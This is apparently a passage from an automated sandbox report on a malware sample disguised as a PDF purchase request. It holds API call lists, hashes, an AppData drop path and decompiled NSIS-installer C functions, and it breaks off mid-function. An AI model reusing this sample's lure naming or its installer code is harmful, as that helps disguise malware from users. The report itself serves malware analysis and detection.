0x00405103
0x0040510a
0x0040510d
0x0040510d
0x00405113
0x0040511a
0x0040511d
0x0040511d
0x00405123
0x00405129
0x0040512f
0x0040512f
0x0040513c
0x00405292
0x00405299
0x004052b6
0x004052bc
0x004052ce
0x004052ce
0x00000000
0x00405142
0x00405144
0x00405149
0x0040514e
0x00405153
0x00405155
0x00405155
0x00405156
0x00405157
0x00405159
0x00405159
0x00405161
0x004051a2
0x004051a4
0x004051b4
0x004051b7
0x004051bc
0x004051c3
0x004051c6
0x00405268
0x0040526e
0x0040527c
0x0040528d
0x0040528d
0x00000000
0x0040527c
0x004051cc
0x004051cf
0x004051d5
0x004051da
0x004051dc
0x004051de
0x004051e4
0x004051eb
0x004051f0
0x004051f7
0x004051fa
0x004051fa
0x00405201
0x0040520d
0x00405211
0x00405213
0x00405213
0x00405203
0x00405205
0x00405205
0x00405233
0x0040523f
0x0040524e
0x0040524e
0x00405250
0x00405253
0x0040525c
0x00000000
0x00405163
0x0040516e
0x00405171
0x00405176
0x00405178
0x0040517c
0x0040518c
0x00405196
0x00405198
0x0040519b
0x00000000
0x00000000
0x00000000
0x00000000
0x0040517e
0x0040517e
0x00405184
0x00405186
0x00405186
0x00405187
0x00405188
0x00000000
0x0040517e
0x00405161
0x0040513c
0x0040507f
0x00000000
0x00405095
0x0040509f
0x004050a4
0x00000000
0x00000000
0x004050b6
0x004050bb
0x004050c7
0x004050c7
0x004050c9
0x004050d8
0x004050da
0x004050de
0x004050e1
0x00000000
0x004050e1
0x0040507f
0x00404d3f
0x00404d44
0x00404d4d
0x00404d54
0x00404d62
0x00404d6d
0x00404d73
0x00404d81
0x00404d95
0x00404d9a
0x00404da7
0x00404dac
0x00404dc2
0x00404dd3
0x00404de0
0x00404de0
0x00404de3
0x00404de9
0x00404deb
0x00404dee
0x00404df3
0x00404df8
0x00404dfa
0x00404dfa
0x00404e1a
0x00404e1a
0x00404e1c
0x00404e1d
0x00404e22
0x00404e25
0x00404e28
0x00404e2c
0x00404e31
0x00404e36
0x00404e3a
0x00404e3f
0x00404e44
0x00404e46
0x00404e4e
0x00404f19
0x00404f2c
0x00000000
0x00404e54
0x00404e57
0x00404e5a
0x00404e5d
0x00404e5d
0x00404e64
0x00404e6a
0x00404e6d
0x00404e73
0x00404e74
0x00404e79
0x00404e82
0x00404e89
0x00404e8c
0x00404e8f
0x00404e92
0x00404ece
0x00404ef7
0x00404ed0
0x00404edd
0x00404edd
0x00404e94
0x00404e97
0x00404ea6
0x00404eb0
0x00404eb8
0x00404ebf
0x00404ec7
0x00404ec7
0x00404e92
0x00404efd
0x00404efe
0x00404f0a
0x00404f0a
0x00404f17
0x00404f32
0x00404f36
0x00404f53
0x00404f58
0x00000000
0x00404f38
0x00404f3d
0x00404f46
0x004052d0
0x004052e2
0x004052e2
0x00404f36
0x00000000
0x00404f17
0x00404e4e

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404D05
GetDlgItem.USER32(?,00000408), ref: 00404D10
GlobalAlloc.KERNEL32(00000040,?), ref: 00404D5A
LoadBitmapW.USER32(0000006E), ref: 00404D6D
SetWindowLongW.USER32(?,000000FC,004052E5), ref: 00404D86
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D9A
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404DAC
SendMessageW.USER32(?,00001109,00000002), ref: 00404DC2
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404DCE
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404DE0
DeleteObject.GDI32(00000000), ref: 00404DE3
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404E0E
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404E1A
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404EB0
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404EDB
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404EEF
GetWindowLongW.USER32(?,000000F0), ref: 00404F1E
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404F2C
ShowWindow.USER32(?,00000005), ref: 00404F3D
SendMessageW.USER32(?,00000419,00000000,?), ref: 0040503A
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040509F
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004050B4
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004050D8
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004050F8
ImageList_Destroy.COMCTL32(?), ref: 0040510D
GlobalFree.KERNEL32(?), ref: 0040511D
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405196
SendMessageW.USER32(?,00001102,?,?), ref: 0040523F
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040524E
InvalidateRect.USER32(?,00000000,00000001), ref: 0040526E
ShowWindow.USER32(?,00000000), ref: 004052BC
GetDlgItem.USER32(?,000003FE), ref: 004052C7
ShowWindow.USER32(00000000), ref: 004052CE

Strings

N, xrefs: 00404F78
M, xrefs: 00404E97
, xrefs: 004052A6

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: a20ec76394ec9aa9d7ee758541d4fa6294dbf0a1b8cf6e8fb4ee4d3cfcbb4640
Instruction ID: fabf201a6726aaeed1f236dd7cd6744ceb795820712aa309ba6ddf90c5850425
Opcode Fuzzy Hash: a20ec76394ec9aa9d7ee758541d4fa6294dbf0a1b8cf6e8fb4ee4d3cfcbb4640
Instruction Fuzzy Hash: A4027DB0A00209EFDF209F54CD85AAE7BB5FB44314F50817AE610BA2E0D7799E52DF58

Uniqueness

Uniqueness Score: -1.00%

Function 00404771 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E00404771(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x422700; // 0x79c00c
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E0040593B(0x3fb, _t146);
					E004064A6(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E0040593B(0x3fb, _t146);
							if(E00405CCE(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E00406212(0x4216f8, _t146);
							_t87 = E004065EC(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00406212(0x4216f8, _t146);
								_t89 = E00405C71(0x4216f8);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x4216f8,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x4216f8) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x4216f8,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405C12(0x4216f8);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x4216f8) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404C0E(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x42921c + 0x10)) != _t158) {
									E00404BF6(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x4216e8);
									} else {
										E00404B2D(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42a2e4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E004042F8(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x423718 == _t158) {
									E00404706();
								}
								 *0x423718 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x423728;
							_v60 = E00404AC7;
							_v56 = _t146;
							_v68 = E00406234(_t146, 0x423728, _t167, 0x421f00, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405BC6(_t146);
								_t125 =  *((intOrPtr*)( *0x42a250 + 0x11c));
								if( *((intOrPtr*)( *0x42a250 + 0x11c)) != 0 && _t146 == L"C:\\Users\\Arthur\\AppData\\Local\\Folkedansens\\Suffigere\\Glaucophane") {
									E00406234(_t146, 0x423728, _t167, 0, _t125);
									if(lstrcmpiW(0x4281e0, 0x423728) != 0) {
										lstrcatW(_t146, 0x4281e0);
									}
								}
								 *0x423718 =  *0x423718 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405C3D(_t146) != 0 && E00405C71(_t146) == 0) {
						E00405BC6(_t146);
					}
					 *0x429218 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E004042D6(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004042D6(_t167);
					E0040430B(_t166);
					_t138 = E004065EC(6);
					if(_t138 == 0) {
						L53:
						return E0040433D(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}

0x00404771
0x00404777
0x0040477d
0x0040478a
0x00404798
0x0040479b
0x004047a3
0x004047a9
0x004047a9
0x004047b5
0x004047b8
0x00404826
0x0040482d
0x00404904
0x0040490b
0x0040491a
0x0040491a
0x0040491e
0x00404928
0x00404935
0x00404937
0x00404937
0x00404945
0x0040494c
0x00404953
0x00404956
0x00404992
0x00404994
0x0040499a
0x0040499f
0x004049a3
0x004049a5
0x004049a5
0x004049c1
0x00000000
0x004049c3
0x004049c6
0x004049d4
0x004049da
0x004049db
0x004049de
0x004049e1
0x00000000
0x004049e1
0x00404958
0x0040495a
0x0040495e
0x00000000
0x00000000
0x00000000
0x00000000
0x00404960
0x00404960
0x0040496d
0x00404972
0x00000000
0x00000000
0x00404976
0x00404978
0x00404978
0x00404981
0x00404983
0x00404988
0x0040498b
0x00404990
0x00000000
0x00000000
0x00000000
0x00000000
0x00404990
0x004049ed
0x004049f7
0x004049fa
0x004049fd
0x00404a04
0x00404a04
0x00404a06
0x00404a06
0x00404a0b
0x00404a0d
0x00404a15
0x00404a1c
0x00404a1e
0x00404a29
0x00404a29
0x00404a1e
0x00404a39
0x00404a43
0x00404a4b
0x00404a66
0x00404a4d
0x00404a56
0x00404a56
0x00404a4b
0x00404a6b
0x00404a70
0x00404a75
0x00404a7e
0x00404a7e
0x00404a87
0x00404a89
0x00404a89
0x00404a95
0x00404a9d
0x00404aa7
0x00404aa7
0x00404aac
0x00000000
0x00404aac
0x00404956
0x0040490d
0x00404914
0x00000000
0x00000000
0x00000000
0x00404914
0x00404833
0x0040483c
0x00404856
0x0040485b
0x00404865
0x0040486c
0x00404878
0x0040487b
0x0040487e
0x00404885
0x0040488d
0x00404890
0x00404894
0x0040489b
0x004048a3
0x004048fd
0x004048a5
0x004048a6
0x004048ad
0x004048b7
0x004048bf
0x004048cc
0x004048e0
0x004048e4
0x004048e4
0x004048e0
0x004048e9
0x004048f6
0x004048f6
0x004048a3
0x00000000
0x0040485b
0x00404849
0x00000000
0x00000000
0x0040484f
0x00000000
0x004047ba
0x004047c7
0x004047d0
0x004047dd
0x004047dd
0x004047e4
0x004047ea
0x004047f3
0x004047f6
0x004047f9
0x00404801
0x00404804
0x00404807
0x0040480d
0x00404814
0x0040481b
0x00404ab2
0x00404ac4
0x00404821
0x00404824
0x00000000
0x00404824
0x0040481b

APIs

GetDlgItem.USER32(?,000003FB), ref: 004047C0
SetWindowTextW.USER32(00000000,?), ref: 004047EA
SHBrowseForFolderW.SHELL32(?), ref: 0040489B
CoTaskMemFree.OLE32(00000000), ref: 004048A6
lstrcmpiW.KERNEL32(Call,00423728,00000000,?,?), ref: 004048D8
lstrcatW.KERNEL32(?,Call), ref: 004048E4
SetDlgItemTextW.USER32(?,000003FB,?), ref: 004048F6

Part of subcall function 0040593B: GetDlgItemTextW.USER32(?,?,00000400,0040492D), ref: 0040594E

Part of subcall function 004064A6: CharNextW.USER32(?,*?|<>/":,00000000,00000000,74E03420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe",00403425,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 00406509
Part of subcall function 004064A6: CharNextW.USER32(?,?,?,00000000), ref: 00406518
Part of subcall function 004064A6: CharNextW.USER32(?,00000000,74E03420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe",00403425,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 0040651D
Part of subcall function 004064A6: CharPrevW.USER32(?,?,74E03420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe",00403425,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 00406530

GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,00000001,004216F8,?,?,000003FB,?), ref: 004049B9
MulDiv.KERNEL32(?,0000040F,00000400), ref: 004049D4

Part of subcall function 00404B2D: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404BCE
Part of subcall function 00404B2D: wsprintfW.USER32 ref: 00404BD7
Part of subcall function 00404B2D: SetDlgItemTextW.USER32(?,00423728), ref: 00404BEA

Strings

(7B, xrefs: 0040486E
C:\Users\user\AppData\Local\Folkedansens\Suffigere\Glaucophane, xrefs: 004048C1
A, xrefs: 00404894
Call, xrefs: 004048D2, 004048D7, 004048E2

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: (7B$A$C:\Users\user\AppData\Local\Folkedansens\Suffigere\Glaucophane$Call
API String ID: 2624150263-1893811299
Opcode ID: e43852254ac290d899d2cb30e4ffd6e16939f72f52f3a6c30364b771b279711a
Instruction ID: 8b4fcc303a4382937c11c1a66aa2d821073b610587f94151fb5846b241658984
Opcode Fuzzy Hash: e43852254ac290d899d2cb30e4ffd6e16939f72f52f3a6c30364b771b279711a
Instruction Fuzzy Hash: 13A14FF1A00209ABDB11AFA5C941AAF77B8EF84314F10847BF611B62D1D77C8A418F6D

Uniqueness

Uniqueness Score: -1.00%

Function 10001B18 Relevance: 20.0, APIs: 13, Instructions: 544
stringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E10001B18() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				WCHAR* _v44;
				signed int _v48;
				void* _v52;
				intOrPtr _v56;
				WCHAR* _t199;
				signed int _t202;
				void* _t204;
				void* _t206;
				WCHAR* _t208;
				void* _t216;
				struct HINSTANCE__* _t217;
				struct HINSTANCE__* _t218;
				struct HINSTANCE__* _t220;
				signed short _t222;
				struct HINSTANCE__* _t225;
				struct HINSTANCE__* _t227;
				void* _t228;
				intOrPtr* _t229;
				void* _t240;
				signed char _t241;
				signed int _t242;
				struct HINSTANCE__* _t248;
				void* _t249;
				signed int _t251;
				short* _t253;
				signed int _t259;
				void* _t260;
				signed int _t263;
				signed int _t266;
				signed int _t267;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				void* _t278;
				void* _t282;
				struct HINSTANCE__* _t284;
				signed int _t287;
				void _t288;
				signed int _t289;
				signed int _t301;
				signed int _t302;
				signed short _t308;
				signed int _t309;
				WCHAR* _t310;
				WCHAR* _t312;
				WCHAR* _t313;
				struct HINSTANCE__* _t314;
				void* _t316;
				signed int _t318;
				void* _t319;

				_t284 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v8 = 0;
				_v40 = 0;
				_t319 = 0;
				_v48 = 0;
				_t199 = E1000121B();
				_v24 = _t199;
				_v28 = _t199;
				_v44 = E1000121B();
				_t309 = E10001243();
				_v52 = _t309;
				_v12 = _t309;
				while(1) {
					_t202 = _v32;
					_v56 = _t202;
					if(_t202 != _t284 && _t319 == _t284) {
						break;
					}
					_t308 =  *_t309;
					_t287 = _t308 & 0x0000ffff;
					_t204 = _t287 - _t284;
					if(_t204 == 0) {
						_t33 =  &_v32;
						 *_t33 = _v32 | 0xffffffff;
						__eflags =  *_t33;
						L17:
						_t206 = _v56 - _t284;
						if(_t206 == 0) {
							__eflags = _t319 - _t284;
							 *_v28 = _t284;
							if(_t319 == _t284) {
								_t319 = GlobalAlloc(0x40, 0x1ca4);
								 *(_t319 + 0x1010) = _t284;
								 *(_t319 + 0x1014) = _t284;
							}
							_t288 = _v36;
							_t43 = _t319 + 8; // 0x8
							_t208 = _t43;
							_t44 = _t319 + 0x808; // 0x808
							_t310 = _t44;
							 *_t319 = _t288;
							_t289 = _t288 - _t284;
							__eflags = _t289;
							 *_t208 = _t284;
							 *_t310 = _t284;
							 *(_t319 + 0x1008) = _t284;
							 *(_t319 + 0x100c) = _t284;
							 *(_t319 + 4) = _t284;
							if(_t289 == 0) {
								__eflags = _v28 - _v24;
								if(_v28 == _v24) {
									goto L39;
								}
								_t316 = 0;
								GlobalFree(_t319);
								_t319 = E10001311(_v24);
								__eflags = _t319 - _t284;
								if(_t319 == _t284) {
									goto L39;
								} else {
									goto L32;
								}
								while(1) {
									L32:
									_t240 =  *(_t319 + 0x1ca0);
									__eflags = _t240 - _t284;
									if(_t240 == _t284) {
										break;
									}
									_t316 = _t319;
									_t319 = _t240;
									__eflags = _t319 - _t284;
									if(_t319 != _t284) {
										continue;
									}
									break;
								}
								__eflags = _t316 - _t284;
								if(_t316 != _t284) {
									 *(_t316 + 0x1ca0) = _t284;
								}
								_t241 =  *(_t319 + 0x1010);
								__eflags = _t241 & 0x00000008;
								if((_t241 & 0x00000008) == 0) {
									_t242 = _t241 | 0x00000002;
									__eflags = _t242;
									 *(_t319 + 0x1010) = _t242;
								} else {
									_t319 = E1000158F(_t319);
									 *(_t319 + 0x1010) =  *(_t319 + 0x1010) & 0xfffffff5;
								}
								goto L39;
							} else {
								_t301 = _t289 - 1;
								__eflags = _t301;
								if(_t301 == 0) {
									L28:
									lstrcpyW(_t208, _v44);
									L29:
									lstrcpyW(_t310, _v24);
									L39:
									_v12 = _v12 + 2;
									_v28 = _v24;
									L63:
									if(_v32 != 0xffffffff) {
										_t309 = _v12;
										continue;
									}
									break;
								}
								_t302 = _t301 - 1;
								__eflags = _t302;
								if(_t302 == 0) {
									goto L29;
								}
								__eflags = _t302 != 1;
								if(_t302 != 1) {
									goto L39;
								}
								goto L28;
							}
						}
						if(_t206 != 1) {
							goto L39;
						}
						_t248 = _v16;
						if(_v40 == _t284) {
							_t248 = _t248 - 1;
						}
						 *(_t319 + 0x1014) = _t248;
						goto L39;
					}
					_t249 = _t204 - 0x23;
					if(_t249 == 0) {
						__eflags = _t309 - _v52;
						if(_t309 <= _v52) {
							L15:
							_v32 = _t284;
							_v36 = _t284;
							goto L17;
						}
						__eflags =  *((short*)(_t309 - 2)) - 0x3a;
						if( *((short*)(_t309 - 2)) != 0x3a) {
							goto L15;
						}
						__eflags = _v32 - _t284;
						if(_v32 == _t284) {
							L40:
							_t251 = _v32 - _t284;
							__eflags = _t251;
							if(_t251 == 0) {
								__eflags = _t287 - 0x2a;
								if(_t287 == 0x2a) {
									_v36 = 2;
									L61:
									_t309 = _v12;
									_v28 = _v24;
									_t284 = 0;
									__eflags = 0;
									L62:
									_t318 = _t309 + 2;
									__eflags = _t318;
									_v12 = _t318;
									goto L63;
								}
								__eflags = _t287 - 0x2d;
								if(_t287 == 0x2d) {
									L131:
									__eflags = _t308 - 0x2d;
									if(_t308 != 0x2d) {
										L134:
										_t253 = _t309 + 2;
										__eflags =  *_t253 - 0x3a;
										if( *_t253 != 0x3a) {
											L141:
											_v28 =  &(_v28[0]);
											 *_v28 = _t308;
											goto L62;
										}
										__eflags = _t308 - 0x2d;
										if(_t308 == 0x2d) {
											goto L141;
										}
										_v36 = 1;
										L137:
										_v12 = _t253;
										__eflags = _v28 - _v24;
										if(_v28 <= _v24) {
											 *_v44 = _t284;
										} else {
											 *_v28 = _t284;
											lstrcpyW(_v44, _v24);
										}
										goto L61;
									}
									_t253 = _t309 + 2;
									__eflags =  *_t253 - 0x3e;
									if( *_t253 != 0x3e) {
										goto L134;
									}
									_v36 = 3;
									goto L137;
								}
								__eflags = _t287 - 0x3a;
								if(_t287 != 0x3a) {
									goto L141;
								}
								goto L131;
							}
							_t259 = _t251 - 1;
							__eflags = _t259;
							if(_t259 == 0) {
								L74:
								_t260 = _t287 - 0x22;
								__eflags = _t260 - 0x55;
								if(_t260 > 0x55) {
									goto L61;
								}
								switch( *((intOrPtr*)(( *(_t260 + 0x10002230) & 0x000000ff) * 4 +  &M100021CC))) {
									case 0:
										__ecx = _v24;
										__edi = _v12;
										while(1) {
											__edi = __edi + 1;
											__edi = __edi + 1;
											_v12 = __edi;
											__ax =  *__edi;
											__eflags = __ax - __dx;
											if(__ax != __dx) {
												goto L116;
											}
											L115:
											__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
											if( *((intOrPtr*)(__edi + 2)) != __dx) {
												L120:
												 *__ecx =  *__ecx & 0x00000000;
												__ebx = E1000122C(_v24);
												goto L91;
											}
											L116:
											__eflags = __ax;
											if(__ax == 0) {
												goto L120;
											}
											__eflags = __ax - __dx;
											if(__ax == __dx) {
												__edi = __edi + 1;
												__edi = __edi + 1;
												__eflags = __edi;
											}
											__ax =  *__edi;
											 *__ecx =  *__edi;
											__ecx = __ecx + 1;
											__ecx = __ecx + 1;
											__edi = __edi + 1;
											__edi = __edi + 1;
											_v12 = __edi;
											__ax =  *__edi;
											__eflags = __ax - __dx;
											if(__ax != __dx) {
												goto L116;
											}
											goto L115;
										}
									case 1:
										_v8 = 1;
										goto L61;
									case 2:
										_v8 = _v8 | 0xffffffff;
										goto L61;
									case 3:
										_v8 = _v8 & 0x00000000;
										_v20 = _v20 & 0x00000000;
										_v16 = _v16 + 1;
										goto L79;
									case 4:
										__eflags = _v20;
										if(_v20 != 0) {
											goto L61;
										}
										_v12 = _v12 - 2;
										__ebx = E1000121B();
										 &_v12 = E10001A9F( &_v12);
										__eax = E10001470(__edx, __eax, __edx, __ebx);
										goto L91;
									case 5:
										L99:
										_v20 = _v20 + 1;
										goto L61;
									case 6:
										_push(7);
										goto L107;
									case 7:
										_push(0x19);
										goto L127;
									case 8:
										_push(0x15);
										goto L127;
									case 9:
										_push(0x16);
										goto L127;
									case 0xa:
										_push(0x18);
										goto L127;
									case 0xb:
										_push(5);
										goto L107;
									case 0xc:
										__eax = 0;
										__eax = 1;
										goto L85;
									case 0xd:
										_push(6);
										goto L107;
									case 0xe:
										_push(2);
										goto L107;
									case 0xf:
										_push(3);
										goto L107;
									case 0x10:
										_push(0x17);
										L127:
										_pop(__ebx);
										goto L92;
									case 0x11:
										__eax =  &_v12;
										__eax = E10001A9F( &_v12);
										__ebx = __eax;
										__ebx = __eax + 1;
										__eflags = __ebx - 0xb;
										if(__ebx < 0xb) {
											__ebx = __ebx + 0xa;
										}
										goto L91;
									case 0x12:
										__ebx = 0xffffffff;
										goto L92;
									case 0x13:
										_v48 = _v48 + 1;
										_push(4);
										_pop(__eax);
										goto L85;
									case 0x14:
										__eax = 0;
										__eflags = 0;
										goto L85;
									case 0x15:
										_push(4);
										L107:
										_pop(__eax);
										L85:
										__edi = _v16;
										__ecx =  *(0x1000305c + __eax * 4);
										__edi = _v16 << 5;
										__edx = 0;
										__edi = (_v16 << 5) + __esi;
										__edx = 1;
										__eflags = _v8 - 0xffffffff;
										_v40 = 1;
										 *(__edi + 0x1018) = __eax;
										if(_v8 == 0xffffffff) {
											L87:
											__ecx = __edx;
											L88:
											__eflags = _v8 - __edx;
											 *(__edi + 0x1028) = __ecx;
											if(_v8 == __edx) {
												__eax =  &_v12;
												__eax = E10001A9F( &_v12);
												__eax = __eax + 1;
												__eflags = __eax;
												_v8 = __eax;
											}
											__eax = _v8;
											 *((intOrPtr*)(__edi + 0x101c)) = _v8;
											_t133 = _v16 + 0x81; // 0x81
											_t133 = _t133 << 5;
											__eax = 0;
											__eflags = 0;
											 *((intOrPtr*)((_t133 << 5) + __esi)) = 0;
											 *((intOrPtr*)(__edi + 0x1030)) = 0;
											 *((intOrPtr*)(__edi + 0x102c)) = 0;
											goto L91;
										}
										__eflags = __ecx;
										if(__ecx > 0) {
											goto L88;
										}
										goto L87;
									case 0x16:
										_t262 =  *(_t319 + 0x1014);
										__eflags = _t262 - _v16;
										if(_t262 > _v16) {
											_v16 = _t262;
										}
										_v8 = _v8 & 0x00000000;
										_v20 = _v20 & 0x00000000;
